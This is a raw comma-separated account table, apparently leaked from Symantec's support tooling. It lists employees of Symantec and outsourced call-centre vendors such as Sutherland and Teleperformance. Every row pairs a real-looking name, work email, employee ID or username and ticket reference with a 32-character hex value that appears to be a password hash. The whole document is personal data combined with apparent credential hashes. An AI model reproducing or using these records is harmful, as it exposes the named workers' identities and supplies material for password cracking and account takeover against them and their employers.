76ce-49c6-b282-516641e10df9,SRB 19.07.2010,INC213497,tools_id@symantec.suth.com,
Sutherland,6e13e0b368f4d3a997d549a9b6004197,Gokotano,<blank>,075162,Amy,NULL,NUL
L,NULL
6e8a-4da9-bd66-e0ac3de4180a,<blank>,emprov,tools_id@symantec.suth.com,sutherland
,81c68a9d81cd46a612d133b563eeb26f,JK,<blank>,095041,Jamal Asif,NULL,NULL,NULL
7ff8-408c-8d04-d5c6fa0fae13,<blank>,<blank>,scott_preschern@symantec.com,Symante
c,a71ef74cceaa20150a222ed3a029654e,Preschern,<blank>,scot_preschern,Scot,NULL,NU
LL,NULL
66b-4d63-8636-10d46fdc8a1c,<blank>,081007/INC51865 ,Tools_Id@symantec.Suth.com,s
utherland,bd6894d37d95131311df23bf0ad415ce,C Durward,<blank>,Stephen_CDurward,St
ephen,NULL,NULL,NULL
2fd4-4ec5-b0fe-e88ed333c091,CRQ000000460075 SP 21 Dec 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,490e72c204d3cb99302323408af0a055,Casumlong,<blank>,123
205,Ronald Langgoy,NULL,NULL,NULL
636e-4893-a813-ffb34137517b,CRQ000000290967--vmd--30/06/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,bd6481a4fc55b654470d3d495b34b4e5,S,<blank>,112773,Sab
ari Raj,NULL,NULL,NULL
a68-4b47-ade1-a05d07cf9665,<blank>,<blank>,accounts@symantec.teleperformance.gr,
TPG,b24431ebc92db7dfdad26650ca5f3e1b,Giouli,<blank>,Konstantina_Giouli,Konstanti
na,NULL,NULL,NULL
e5a0-449a-b310-00e759559060,CRQ000000460807 SP 21 Dec 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,44ae01c281aa0421af333eb4c3383510,Fortuno,<blank>,12322
8,Jenneth Amparo,NULL,NULL,NULL
2e3a-4ad3-84c5-23fc65e6185e,CRQ000000461156 SP 21 Dec 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,d4d99df96b26033535246582b2ab0340,Calpito,<blank>,12323
0,Hercy Dedicatoria,NULL,NULL,NULL
fb8-46d6-97ad-0b246ed97bc3,<blank>,080626,ming_chai@symantec.com,sutherland,bcde
fe6b7dae6d602dcaebc2a287a7d7,Faget,<blank>,Andy_Faget,Andy,NULL,NULL,NULL
0844-4978-a9cc-2f540fdf893b,CRQ000000461160 SP 21 Dec 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,55f409f5c15a78cb861fffcce3c30f20,Delfin,<blank>,123243
,Kevin Camora,NULL,NULL,NULL
e5dd-4bb5-9c85-1d216b40073a,SSS 17/12/09,EMPROV,tools_id@symantec.suth.com,Suthe
rland,6ef226ae7baaf2af97c4b19ef50d9463,J,<blank>,sreehari_j_cc,Sreehari,NULL,NUL
L,NULL
b0ee-4cd8-8e9c-9fa8436003cc,SRB 19.07.2010,INC213497,tools_id@symantec.suth.com,
Sutherland,f92eaf1d14a18c701b655781c5c9beb4,Auman,<blank>,075165,Renante,NULL,NU
LL,NULL
5123-4291-be73-7637e239c658,<blank>,<blank>,tools_id@symantec.suth.com,RM-21Dec-
2011-CRQ000000464926,78d52049e46bbf807e559688ff6aff0c,Suarez,<blank>,123260,Shal
om Sidney Reyes,NULL,NULL,NULL
5302-41db-b9a8-2b4853968bc5,<blank>,<blank>,tools_id@symantec.suth.com,RM-21Dec-
2011-CRQ000000464947,39a380bce43d21e85247041978b903de,Orpiano,<blank>,123267,Ma.
Noemi Allam,NULL,NULL,NULL
7703-4614-94fd-0928bf6cf8c9,<blank>,<blank>,mara.samira.pineiro@teleperformance.
com.ar,RM-22Dec-CRQ000000467228,67d8593f81524a8f7105092e06868036,Pi\xf1eiro,<bla
nk>,123498,Mara Samira,NULL,NULL,NULL
3b2d-4b22-b389-2f7a2957900d,sms 01.10,INC182175,tools_id@symantec.suth.com,Suthe
rland,888128b3f18cae10e3b46ea5b07060f0,Shaikh,<blank>,087373,Ejaz,NULL,NULL,NULL
2993-4013-9812-929e4dcb5904,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb 24
2012-CRQ000000568749,ba2e259933a44cd99a99de8f25892649,Luis Guico Tuguigui,<blan
k>,125307,John,NULL,NULL,NULL
739c-4066-b971-60aa1edc88b7,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb27
2012-CRQ000000570831,cea55defa5c3e16a07ac20c6b5bdd1b2,Frantz,<blank>,125341,Lynd
en,NULL,NULL,NULL
d51a-4918-9ae6-5bab270ca4b7,INC213497,nam 07/13/2010,tools_id@symantec.suth.com,
Sutherland,bba0172292938dd956be3f092802c899,Suryaprakash,<blank>,102080,Barath K
umar,NULL,NULL,NULL
4a1-4ae3-b84a-07d0b429943c,sms 29,86852/2614952,Tools_id@symantec.suth.com,"Suth
erland Global Services, Inc.",11b9bad7a3c5593e2dda371047fb6326,Ann Abastillas,<b
lank>,chereshaann_abastill,Cheresha,NULL,NULL,NULL
20a-4ae2-8fa4-fa31ca986a25,<blank>,86059,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",7cf81ab0dbfcb5b3d76b6ed325fbe5d5,Harish K V,<blank>,moham
med_harishkv,Mohammed,NULL,NULL,NULL
a53-4241-a730-50bf33a4a7b2,<blank>,<blank>,Herman_Kachuriner@symantec.com,Symant
ec,e7e45347334bb522838fe4951eed18e0,Kachuriner,<blank>,Herman_Kachuriner,Herman,
NULL,NULL,NULL
03e7-4248-95ca-9c96f644e8fc,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb27
2012-CRQ000000570848,e8015fc34716a4cdc7b50bbcd2aa51cf,R,<blank>,125346,Shekar,NU
LL,NULL,NULL
2c23-4185-b1bd-8d4dccc47328,sms 29,INC182175,tools_id@symantec.suth.com,Sutherla
nd,0814cf97daeb758db1ac10c8be8d897e,Saransate,<blank>,085759,Jervin Moncada,NULL
,NULL,NULL
2a03-457a-b39d-d29c6d28872c,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
591374 - PR - 14th March 2012,4ac512d00981396215485c35fd334c91,Binza,<blank>,222
409,Ariel,NULL,NULL,NULL
116-43ea-af07-b7c3c8ce69fe,<blank>,<blank>,stephen_gorrell@symantec.com,Symantec
,dae1eb9d4a4a12418da8c633750aeba0,Gorrell,<blank>,stephen_gorrell,Stephen,NULL,N
ULL,NULL
e472-4415-b952-496743763d1e,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
591383 - PR - 14th March 2012,4946266f72aedd1dd8ae2f2c61ef2363,Cayubit,<blank>,2
22411,Jonathan Neil,NULL,NULL,NULL
ce7b-4c57-a0bd-df21f9956196,<blank>,EMPROV,Tools_Id@symantec.Suth.com,Sutherland
,1ad5fdf7ee45073c67cd26328a413fc2,S,<blank>,086501,Alex,NULL,NULL,NULL
fcb1-482f-aac7-44d5b479cc03,"CRQ000000592934 CLNP Mar 15,2012",999-999-9999,tool
s_id@symantec.suth.com,Sutherland,e38cc23c16f6e4c88d00c8d639458eea,Acharya,<blan
k>,222486,Pramita,NULL,NULL,NULL
d2e-46d8-87d5-8cac12600f52,<blank>,<blank>,symaccounts@e4e.com,e4e,db5ccea472bff
a7b9edf1923886cd97f,R,<blank>,Anjana_R,Anjana,NULL,NULL,NULL
5c4-4a63-83d8-b3aa38e6038e,<blank>,85698,Tools_id@symantec.suth.com,Sutherland G
lobal Services,e87abc4812ba465b2c4eac735cafb43e,Charonneau,<blank>,julian_charon
neau,Julian,NULL,NULL,NULL
daf-475b-82bf-f141eda56431,<blank>,85716,Tools_id@symantec.suth.com,Sutherland G
lobal Services,39d28f25cac5301c4eb926081981a9b1,Hasanuzzaman,<blank>,mohamed_has
anuzzaman,Mohamed,NULL,NULL,NULL
a71-46af-9415-f10f986c0985,<blank>,080453,ming_chai@symantec.com,sutherland,2187
412b5babf40a71218d4825daabcd,Safar Orghani,<blank>,Hani_SafarOrghani,Hani,NULL,N
ULL,NULL
3fa-4def-a371-ee1ccd1a18f8,<blank>,080930/2630245,ming_chai@symantec.com,sutherl
and,906613f2061fa2676666f8be83ec8320,Lavigne,<blank>,Acea_Lavigne,Acea,NULL,NULL
,NULL
fc08-4b92-8dc3-7530df34ddf6,<blank>,EMPROVE,tools_id@symantec.suth.com,Sutherlan
d,b621839ca04cde5113a447b5312a0999,PTM,<blank>,095507,Manu,NULL,NULL,NULL
2482-41d7-ba55-fade824a3256,CRQ000000228071,<blank>,tools_id@symantec.suth.com,S
utherland,8a7e0e4d7ab05f6a2173e6ae1297b5ae,Ignacio,<blank>,114296,Iviemay,NULL,N
ULL,NULL
f432-4e06-a8cd-31d95f3d4e46,CRQ000000315389--VMD--8/8/2011,000-000,tools_id@syma
ntec.suth.com,Sutherland,305151e5af36025b7fe190a686e5c305,Balili,<blank>,119283,
Christopher Mamolo,NULL,NULL,NULL
097e-4238-a631-468c1d90ea54,<blank>,<blank>,tools_id@symantec.suth.com,11th Jan
2012 - PR - CRQ000000496460,092330373c1c5ae96a0006e1726501cd,Sato,<blank>,123844
,ElizaFaith,NULL,NULL,NULL
1c1d-4f61-8cfa-bb7a5c8b9112,NA 17 Mar 2011,CRQ000000220907,tools_id@symantec.sut
h.com,<blank>,fed45bd724762d8355f7bfa5a5b2b928,Turpinti,<blank>,113971,Shanmukha
Srinivasarao,NULL,NULL,NULL
9c51-4ba3-a1cb-c04e116b1a5e,<blank>,EMPROV\\INC60083,tools_id@symantec.suth.com,
Sutherland,39816f9212dca796a0900cd7bb3fd18f,Cani,<blank>,085742,Benjamie,NULL,NU
LL,NULL
1b59-4a94-887d-61d2f3a268c4,CRQ000000221857 PBP 17/03/2011,<blank>,tools_id@syma
ntec.suth.com,Sutherland,dc06ae464acae935e78d931db50657ac,Paul,<blank>,114015,Je
nson,NULL,NULL,NULL
ffbd-4412-a619-e20e28570d49,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,5625e020cdaa11062690b4da1416a7d8,McCrary,<blank>,085803,Christine,NULL,NULL,NUL
L
2bb8-47ce-b330-a4012bb3a3b8,<blank>,<blank>,tools_id@symantec.suth.com,11th Jan
2012 - PR - CRQ000000496468,be1a0d6fa8afb78595927d8816e20aed,Tagitis,<blank>,123
845,Ethelyn,NULL,NULL,NULL
b4a-42cc-b59d-8e932cfca9d1,<blank>,080963/2630245,ming_chai@symantec.com,sutherl
and,a929d7af6c2ea2223bbc82704e62d018,Lin,<blank>,Paul_Lin,Paul,NULL,NULL,NULL
9c1a-4723-84e3-547ba6c676e8,CRQ000000315434--VMD--8/8/2011,000-000,tools_id@syma
ntec.suth.com,Sutherland,c5d3bcebcfe2c3a97fbf3d5a2027a706,K,<blank>,119295,Riyaz
Hussain,NULL,NULL,NULL
e26d-46a0-abf5-41267a12cb79,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,a4993c3876cf05d891cc4f52bacb5992,Saheb,<blank>,086183,Umerfaruk,NULL,NULL,NULL
5ef0-4904-a3d9-867122da8f2d,CRQ000000315437--VMD--8/8/2011,000-000,tools_id@syma
ntec.suth.com,Sutherland,2e2929e9b1a302672333d6627d2cf083,S,<blank>,119296,Sathi
sh Kumar,NULL,NULL,NULL
172-4023-853f-f895c100f7a4,<blank>,89141,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",d2143ded91c75aa642e022469c336e9e,Joseph,<blank>,jebin_jos
eph,Jebin,NULL,NULL,NULL
2371-43bb-bd14-5f07fb83315e,CRQ000000229059-KD-30-03-2011,000-000,prithiviraj_s@
symantec.com,Symantec,93f2f3582b69182c831da671f9eff5d3,S,<blank>,113105,PRITHIVI
RAJ,NULL,NULL,NULL
b3fb-4f19-bbdf-9ea0ed4c7ca1,CRQ000000456354 CLNP 19 Dec 2011,000-0000,Ricardo_Ar
ballo@symantec.com,Symantec,99dc5adced919e7b39a7ae181b0a6c23,Arballo,<blank>,122
559,Ricardo,NULL,NULL,NULL
f19b-4a41-bbb5-ce275918cf75,CRQ000000467035 SP 22 Dec 2011,000-0000,csainjon@sym
antec.teleperformance.gr,Teleperformance,9c75bf2d627834efb38ef7d03335ddc8,Sainjo
n,<blank>,072223,Claude,NULL,NULL,NULL
2d4-4951-9e44-ee3c20557522,<blank>,080222,ming_chai@symantec.com,sutherland,5d58
04461bf0d7265e60764b489764b8,Minh Pham,<blank>,Thi_MinhPham,Thi,NULL,NULL,NULL
78b6-47a0-94f2-c874a00e6f2a,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,fd07ec1077070ca9247ea63648335b08,King,<blank>,088521,Matthew,NULL,NULL,NULL
c69-4ff4-9adf-6848d9bda0cf,<blank>,080384,ming_chai@symantec.com,sutherland,af95
757571ee2ac0b629d3bbee27362d,Mamumor Rashid,<blank>,MD_MamumorRashid,MD.,NULL,NU
LL,NULL
0e25-4bad-b24f-2c7d3cfd554c,INC213497,nam 07/15/2010,tools_id@symantec.suth.com,
Sutherland,b5c88bd4a504af5759e05fb931c8e985,SelmaTampos,<blank>,101760,FelixJr.,
NULL,NULL,NULL
25f7-43fe-a706-f015d0096e27,IT_Volume_Access_Request_20110405_NortonLive062,<bla
nk>,pedrocristo_paglinga@symantec.com,CRQ000000247199 - PR - 4/28/2011,292a63933
b236499fc5e376f5dc81c1c,Paglingayen Jr,<blank>,114739,Pedro Cristo,NULL,NULL,NUL
L
32bb-443f-b2b9-c073b83210a4,CRQ000000486367 CLNP 04 Jan 2011,000-0000,tools_id@s
ymantec.suth.com,Sutherland,1fe6ac508de8213b3471e6b969e76a9d,Salazar,<blank>,123
642,Dondie,NULL,NULL,NULL
30f-4aea-923d-0617ee02c818,<blank>,081018,ming_chai@symantec.com,sutherland,f1d0
db76b88ba034bafcbfb25d885f9e,Castillo,<blank>,Adrian_Castillo,Adrian,NULL,NULL,N
ULL
4fd1-4de5-bd45-789a2def62ac,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb 3-
2012-CRQ000000539175,da042b493576cfac0718a87d07266784,Paz Hernandez,<blank>,1245
30,Carissa,NULL,NULL,NULL
f4f0-4452-ab31-f2dc937739ad,08/01/2007 - SPJ,EMPROV,Tools_Id@Symantec.Suth.com,S
utherland,f3131d8c5083ee18ec50f0507b10eac5,Chauhan,<blank>,098229,Pankaj,NULL,NU
LL,NULL
064-4e3c-8cf9-b44f80780f03,<blank>,081025/INC41036,tools_id@symantec.suth.com,su
therland,56f3a6d769ce6b3cc38cff022b3aa972,A Mesaros,<blank>,Mara_AMesaros,Mara,N
ULL,NULL,NULL
cf48-4be4-9125-0257e09bad02,SRB 24.08.2010,INC000000249136,Tools_ID@Symantec.Sut
h.Com,Sutherland,e181ee7e7e59cc0bf21167b9c09ab61c,Mahapatra,<blank>,105243,Deepa
k,NULL,NULL,NULL
eb5-40f7-8552-1bf8852a3bae,<blank>,86353,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",fb11456cebf78d85bdc3adbf794f2abb,Sengar,<blank>,dhiraj_se
ngar,Dhiraj,NULL,NULL,NULL
d3fd-49d1-9f1b-a6a6cde3518b,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb 24
2012-CRQ000000568713,c5f0cda38db514ad3a6e820b86a1a1b1,Anne Retalo Medina,<blan
k>,125300,Gianina,NULL,NULL,NULL
d3fb-440b-8d5d-d32613017733,INC213497,nam 07/15/2010,tools_id@symantec.suth.com,
Sutherland,dd5eef52c2082e3242a6f529a27c7fb4,Murugesan,<blank>,090377,Senthil,NUL
L,NULL,NULL
d319-4f55-b947-90c73cc59aa2,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb 24
2012-CRQ000000568729,9da103cb4de912a1effd5407572d6fa6,Ashely Ashley Onato,<blan
k>,125301,Sandra,NULL,NULL,NULL
472f-4a71-84ed-fb96375163f4,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb 24
2012-CRQ000000568732,9852149c7b6f9ed054cebfa48201a0d5,Sumangit Prescillas,<blan
k>,125303,Melger,NULL,NULL,NULL
788-4e50-831f-919fd080661c,<blank>,080442,ming_chai@symantec.com,sutherland,c11f
45429563d98c942209ee4c05f93e,Camlis,<blank>,James_Camlis,James,NULL,NULL,NULL
6730-427e-a413-fad84c7eda3b,NA 7 th April 2011,CRQ000000235043,tools_id@symantec
.suth.com,<blank>,f0a59a4f781c7d863be899000f438114,SMK,<blank>,099901,PremKumar,
NULL,NULL,NULL
0bd-4c34-bc6a-48e4a2bb0081,<blank>,<blank>,satish_purbia@symantec.com,<blank>,7b
d51b7145b7a6333f48806fd2105c18,Purbia,<blank>,Satish_Purbia,Satish,NULL,NULL,NUL
L
2d00-4131-b656-1ac513a8c450,CRQ000000236128-vmd-08-04-11,000-000,tools_id@symant
ec.suth.com,Sutherland,672224be96ff34e7879468ec1fd7a252,Briones,<blank>,114696,M
elchor,NULL,NULL,NULL
e5d-4311-a764-d699e4e1c002,<blank>,080505,ming_chai@symantec.com,sutherland,662c
f967dc8b6c8a4f80af53aaab4c81,P Charron,<blank>,Aaron_PCharron,Aaron,NULL,NULL,NU
LL
ebb9-4494-a840-a17482b00bfc,CRQ000000241079,<blank>,Murali_Mohan@symantec.com,KS
C-04/15/2011,63ffe2d17111276692a4837b6efe4034,Mohan,<blank>,114406,Murali,NULL,N
ULL,NULL
225b-415c-a275-f602282057e6,CRQ000000241079 PBP 15/04/2011,<blank>,Janardhan_G@s
ymantec.com,Symantec,9bb3229726fea16ad7ccd116f4730e18,G,<blank>,114525,Janardhan
,NULL,NULL,NULL
eed5-484e-8f74-1e6ea1542cfc,CRQ000000241079,<blank>,Nirmal_Nathan@symantec.com,K
SC-04/15/2011,9c2f85cb8c793809601e170eb5a90138,nathan,<blank>,114490,Nirmal,NULL
,NULL,NULL
26cb-4ca3-a363-987ce63db8a6,SRB 27.05.2010,INC182175,tools_id@symantec.suth.com,
Sutherlands,4bb213d67c51f0c80b4a3c6fd3883df4,Belani,<blank>,103397,ManishSantosh
,NULL,NULL,NULL
379-46d5-97a0-4f53dd4e5515,sms 29,89755,Tools_id@symantec.suth.com,"Sutherland G
lobal Services, Inc.",083a82b7e5e35c4b9759ceb48a35db2c,Kumar Mishra,<blank>,abhi
nashkumar_mishra,Abhinash,NULL,NULL,NULL
d3ba-437c-b7e4-5776996b7fcb,CRQ000000241079,<blank>,Pratheep_P@symantec.com,KSC-
04/15/2011,3e53b26c335962c45935dae0d8ac312a,P,<blank>,114408,Pratheep,NULL,NULL,
NULL
486-4a18-9083-44c54f4d1e8c,<blank>,89757,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",7e0c524641d5273901cde0e374869f6e,Kumar P ,<blank>,pradee
p_kumarp,Pradeep,NULL,NULL,NULL
5398-4e56-92dd-1960a5569e8b,nam-08-27-2010,INC000000251664,tools_id@symantec.sut
h.com,Sutherland,d25a9995372bf6c1cbdeda78dbef19d1,Chandran,<blank>,088420,Ajeesh
,NULL,NULL,NULL
8ca0-4a62-a65d-732e02192b1a,CRQ000000241079 PBP 15/04/2011,<blank>,SabeelAhmed_I
@symantec.com,Symantec,31d080cff65aeed570f285cfc076e727,I,<blank>,114447,SabeelA
hmed,NULL,NULL,NULL
0a9d-4535-87c6-793378bae79f,SSS 21.05.10,EMPROV,taisa.goncalves@teleperformance.
com.ar,Teleperformance,e8b1fe54a61735a4162e4c994cc94a73,Galleni,<blank>,098869,J
uan Pablo,NULL,NULL,NULL
50bc-4902-be8c-e76c0c02882a,CRQ000000241079,<blank>,Sujitha_Pasupuleti@symantec.
com,ksc-04/15/2011,4e6c899095af1e42b726f93510503926,Pasupuleti,<blank>,114422,Su
jitha,NULL,NULL,NULL
e6b8-4549-bd19-02929788c65f,CRQ000000241079,<blank>,Rashmin_Patil@symantec.com,k
sc-04/15/2011,90878ee67c9cbf271ff598ba97c5f95c,Patil,<blank>,114522,Rashmin,NULL
,NULL,NULL
b4c-4323-8cdc-b018bd5c385b,<blank>,070221,accounts@symantec.teleperformance.gr,T
PG,d4ad8ae82b18ecc898c9d7307d3b2c3a,Triantafyllou,<blank>,070221,Xanthi,NULL,NUL
L,NULL
b69d-4105-baac-fb72ab283565,CRQ000000221865 PBP 17/03/2011,<blank>,tools_id@syma
ntec.suth.com,Sutherland,b504ff0d813d9bf835cb020aee6903ba,Cronans,<blank>,113994
,Anto Nishanth,NULL,NULL,NULL
80f-4240-b2af-a368d705152b,WS 16-07-2010,081006/INC213497,ming_chai@symantec.com
,sutherland,17c102c0a53d0f86e3f1544d60dfdbc1,Abarca,<blank>,Cesaida_Abarca,Cesai
da,NULL,NULL,NULL
59df-4663-a293-131bdfeda46b,CRQ000000254780 PBP 10/05/2011,<blank>,tools_id@syma
ntec.suth.com,Sutherland,eada2e330f071bf3da8e778cc42b20ba,LlupAdzuara,<blank>,10
1755,CharieMae,NULL,NULL,NULL
b15-4d99-ad74-b3ced5d1d1c9,<blank>,073519,ming_chai@symantec.com,e4e,b05b62cfd1b
67c3455c34003bdf55ee5,Sundarajan,<blank>,Sathish_Sundarajan,Sathish,NULL,NULL,NU
LL
a546-43f6-87a5-e18893beceee,SRB 12.08.2010,INC000000241142,tools_id@symantec.sut
h.com,Sutherland,c120a5c4ca1b61fc4769a03c5b619415,EMarpa,<blank>,096797,Imee Ros
e,NULL,NULL,NULL
5379-44e4-8803-91ae4d6ba105,23/04/2010 - SPJ,EMPROV,accounts@symantec.teleperfor
mance.gr,Teleperformance,c46eb3466a171d8f592e50b6caf52d8d,Chatzopoulos,<blank>,1
03317,Ioannis,NULL,NULL,NULL
603-42ef-997e-1e3724c8ba18,<blank>,074984,Tools_id@symantec.suth.com,Symantec,ce
a549357343c55d324ad81fae7d57ff,Sankunny,<blank>,anoop_sankunny,Anoop,NULL,NULL,N
ULL
f03-47a6-9fff-a3aab9c24ff6,<blank>,078483,ming_chai@symantec.com,sutherland,d15f
233b5f43f1516bc751b051c85bad,Estrada,<blank>,Angelyn_Estrada,Angelyn,NULL,NULL,N
ULL
cd9-441b-bd45-9a0a59307b8e,<blank>,<blank>,Perry.Heijnen@tp-tec.nl,TPH,016b9b217
c1a4ff3fed2962b422ca547,Perry,<blank>,Heijnen_Perry,Heijnen,NULL,NULL,NULL
2d5-44d9-9cde-8db6c1a857b4,<blank>,<blank>,Julio_Cuellar@symantec.com,Symantec,e
41d7a383913ea260beffdfbeac4a4be,Cuellar,<blank>,julio_cuellar,Julio,NULL,NULL,NU
LL
a59-4476-8307-768915a35269,<blank>,<blank>,Ryuhei_Okita@symantec.com,Symantec,05
e7b36dcb81ad45d5894d98c36b3baf,Okita,<blank>,ryuhei_okita,Ryuhei,NULL,NULL,NULL
810-4fba-a77f-581ac70da201,<blank>,86763,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",82d37b58f6313595c7f80e8c00b3f324,U C,<blank>,dhanoop_uc,D
hanoop,NULL,NULL,NULL
97c-4173-a2d3-d2e8cc56cf2e,<blank>,076126,ming_chai@symantec.com,sutherland,220f
b35193510d877f204344f7c05199,Danas,<blank>,Joseph_Danas,Joseph,NULL,NULL,NULL
39d-41a2-8625-d64b25974a2c,<blank>,<blank>,Tools_id@symantec.suth.com,Sutherland
,330202e4955bd83f19b3c109f697bbef,Panchangam,<blank>,madhu_panchangam,Madhu,NULL
,NULL,NULL
560-413c-9733-c3e552378469,<blank>,073211,ming_chai@symantec.com,sutherland,8b95
202ea8a59a77e3dbb355d04a3afd,Feliciano,<blank>,Angelita_Feliciano,Angelita,NULL,
NULL,NULL
ec4-4237-95aa-185191aed2f2,<blank>,073618,ming_chai@symantec.com,e4e,951096e9a77
1a8fa17056dd906740dd2,Giri,<blank>,Sabdha_Giri,Sabdha,NULL,NULL,NULL
08f-4af8-ae9b-431a68358f69,<blank>,073736,ming_chai@symantec.com,e4e,3b49ef4ddd0
ebe4174dc805c4ea60e23,K,<blank>,Hemalatha_K,Hemalatha,NULL,NULL,NULL
82e-4dbd-a098-ff2f89ff9dd1,<blank>,2633251,Tools_id@symantec.suth.com,Symantec,e
58a57b9bfea2c717d9f02a8ce72cd31,Fernandes,<blank>,moses_fernandes,Moses,NULL,NUL
L,NULL
963d-4844-8ca3-acacce14da12,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,61ce271fae0af9d453c1a5b0b17074fe,Samad ,<blank>,abdul_samad_cc,Abdul ,NUL
L,NULL,NULL
5b8-49c2-bfb2-a063a8b80332,<blank>,052727,tomas.ostrand@teleperformance.se,Telep
erformance Nordic,508cceba032f04c3c52bf9fefae7199d,\xd6strand,<blank>,tomas_ostr
and,Tomas,NULL,NULL,NULL
83b-40f5-8fac-5f018b416726,<blank>,090395,Tools_id@symantec.suth.com,<blank>,345
754654ef919911b06d34b738808b9,P,<blank>,alex_p,Alex,NULL,NULL,NULL
b9d-4698-9762-c1509d09f3dd,<blank>,074781,Tools_id@symantec.suth.com,<blank>,dd0
56478589250b3f5d868e45ca8bb3a,Kadam,<blank>,abhijeet_kadam,Abhijeet,NULL,NULL,NU
LL
176f-441a-9eb6-7aac289c370f,sss 27.05.10,EMPROV,Tools_Id@Symantec.Suth.com,Suthe
rland,4c794c22d82ef30eecf737e56be16fa5,SunilChandan,<blank>,097451,Madhur,NULL,N
ULL,NULL
12dc-4b45-bf92-5a2119672d9c,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,7ba6326c65372c014d0d8860bbcdd271,Kumar,<blank>,karthik_kumar_cc,Karthik ,
NULL,NULL,NULL
d3db-4c0b-9c73-c1d2c3928940,12/17/2009 - SPJ,EMPROV,symaccount@ipcdoctor.co.kr,P
C Doctor,38279e97a076c7c221977895328cc52c,Kaneya,<blank>,097779,Masumi,NULL,NULL
,NULL
565-4b37-bfd3-6f1e4ea3b488,<blank>,<blank>,fechou@symantec.com,Symantec,133b14aa
eeda314b2364424e82839767,Chou,<blank>,fei_chou,Fei,NULL,NULL,NULL
5ae8-473c-a261-982c53c6d707,CRQ000000254780 PBP 10/05/2011,<blank>,tools_id@syma
ntec.suth.com,Sutherland,42bfac92af7e4ae6d366448851c027a5,Majid Khan,<blank>,090
014,Sardar,NULL,NULL,NULL
31a-4815-be6c-008acf8c6c8b,<blank>,<blank>,meera_sheen@symantec.com,e4e,f5b87c0b
5f1affc9b3fb027d73e41d6a,Sheen,<blank>,meera_sheen,Meera,NULL,NULL,NULL
a9bc-4a50-a1f3-55409a36e008,CRQ000000460085 SP 21 Dec 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,d379574853130b662d74076a6afc2795,Ayad,<blank>,123215,R
onald Ambrosio,NULL,NULL,NULL
bd92-4e43-a60c-697e3b76f729,CRQ000000460141 SP 21 Dec 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,3d50fef930b8403e064bbccd3ce07678,Vizconde,<blank>,1232
24,Katherine Reus,NULL,NULL,NULL
97d-4d56-9649-a212b12b0e68,<blank>,090384/2633282,Tools_id@symantec.suth.com,Sut
herland,a7113cd3817726654152423ab3f07f55,Neelam,<blank>,selmanraju_neelam,Selman
raju,NULL,NULL,NULL
703e-41ae-b9f0-65bcde503f8d,<blank>,<blank>,Vineeth_P_S@symantec.com,Symantec,66
bd5352fd405e42c1affde93c08ff80,P S,<blank>,Vineeth_PS,Vineeth,NULL,NULL,NULL
71b7-435c-8429-6d0be6150522,CRQ000000460519 SP 21 Dec 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,d31be870180e385d3b4881d39f91a7b1,Chanliongco,<blank>,1
23226,Shayne Mallari,NULL,NULL,NULL
b47e-48fc-9fe9-f46599facd14,CRQ000000245629 PBP 26/04/2011,<blank>,tools_id@syma
ntec.suth.com,Sutherland,c8c4084344c85e8dcc1639c998759833,R,<blank>,115152,Senth
ilKumar,NULL,NULL,NULL
f47d-44e3-87dc-59e410357062,WS 27-08-2010,INC000000251655,tools_id@symantec.suth
.com,sutherland,cfb58561dbabf640425cdb4ef6c5867c,Chekka,<blank>,089751,RangaSuni
lKumar,NULL,NULL,NULL
a042-4396-b135-aa9ea7b73adc,<blank>,<blank>,tools_id@symantec.suth.com,RM-21Dec-
2011-CRQ000000464944,65d4173adf609539177467cead7c7b49,Celebran,<blank>,123266,Ka
strenzke Rautraut,NULL,NULL,NULL
c71-42b3-928c-488fa4d2abd3,<blank>,<blank>,Tom.Stijven@tp-tec.nl,TPH,dc56e26ad60
af9eee1353441cef851e2,Tom,<blank>,Stijven_Tom,Stijven,NULL,NULL,NULL
45cf-4810-b7bd-a3d62ed3e1d8,<blank>,<blank>,tools_id@symantec.suth.com,RM-21Dec-
2011-CRQ000000464953,c225512743f54b0840f7ce5a6432245b,Sarmiento,<blank>,123269,R
ommer Rebamonte,NULL,NULL,NULL
e4c0-4aca-8a72-23c037661478,INC51865 ,EMPROV,Tools_Id@Symantec.Suth.Com,Sutherla
nd,88d7b6d4ec2c51fc8a3bd1c5fc948b98,Gaba,<blank>,080473,Danielle A,NULL,NULL,NUL
L
d10-4d5c-9af4-e9fc26fa7bc9,<blank>,<blank>,George_Park@symantec.com,Symantec,c77
927577507c74e9a4fc47693e124fa,Park,<blank>,george_park,George,NULL,NULL,NULL
271-4b1f-b24f-d96820c1ff9d,<blank>,<blank>,patrick_wang1@symantec.com,Symantec,0
581e7849083612c8ad879579936a7b8,Wang,<blank>,patrick_wang,Patrick,NULL,NULL,NULL
92d7-46cd-9d3e-90d17af96295,<blank>,<blank>,rosenildo.darizdossantos@teleperform
ance.com.ar,RM-22Dec-CRQ000000467397,2cf53aa87cd082ba2568afd1144c2c78,Dariz Dos
Santos,<blank>,123499,Rosenildo,NULL,NULL,NULL
cfad-47a6-b703-deae375ac913,CRQ000000229420,<blank>,tools_id@symantec.suth.com,K
SC-03/30/2011,dcc4662c5fe1d5d20116208c99f12215,Chopra,<blank>,109134,Sanjiv,NULL
,NULL,NULL
